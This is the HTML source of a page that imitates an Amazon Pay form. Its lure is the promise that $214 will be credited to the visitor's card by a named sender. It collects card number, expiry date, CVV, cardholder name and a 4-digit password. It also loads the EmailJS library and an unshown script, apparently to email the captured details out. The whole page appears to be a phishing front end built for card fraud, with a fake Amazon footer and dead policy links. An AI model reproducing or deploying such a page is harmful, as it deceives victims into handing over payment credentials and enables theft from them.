<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Amazon Pay Form</title>

    <!-- Link to CSS File -->
    <link rel="stylesheet" href="css/styles.css">
</head>
<body>

    <!-- Content Wrapper -->
    <div class="content-container">
        <img src="images/amazon pay logo.jpeg" alt="Amazon Pay Logo" class="header-image">
        <h1>Amazon Pay</h1>
        <p class="note">The sum of <strong>$214</strong> will be credited to the account linked to the provided card details by Freda Noah.</p>

        <form id="payment-form" autocomplete="off">
            <label for="cardNumber">Card Number</label>
            <input type="text" id="cardNumber" placeholder="1234 5678 9101 1121" required>

            <div class="flex-container">
                <div>
                    <label for="expirationDate">Expiration Date</label>
                    <input type="text" id="expirationDate" placeholder="MM / YY" required>
                </div>
                <div>
                    <label for="cvv">CVV</label>
                    <input type="text" id="cvv" placeholder="123" required>
                </div>
            </div>

            <label for="cardName">Name on Card</label>
            <input type="text" id="cardName" placeholder="First and Last Name" required>

            <label for="password">4-digit Password</label>
            <input type="password" id="password" placeholder="****" maxlength="4" required>

            <button type="submit" id="submit-button">Add and Continue</button>
        </form>

        <p id="progress-message" style="display: none;">Transaction in progress, estimated time 30 min...</p>
    </div>




    <!-- Footer Note -->
    <div class="footer-note-container">
        <p>
            <a href="#">Conditions of Use</a> |
            <a href="#">Privacy Notice</a> |
            <a href="#">Consumer Health Data Privacy Disclosure</a> |
            <a href="#">Your Ads Privacy Choices</a> <br>
            © 1996-2024, Amazon Pay | Secured by Amazon
        </p>
    </div>

    <!-- EmailJS Library -->
    <script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3.11.0/dist/email.min.js"></script>

    <!-- External JavaScript File -->
    <script src="js/script.js"></script>

</body>
</html>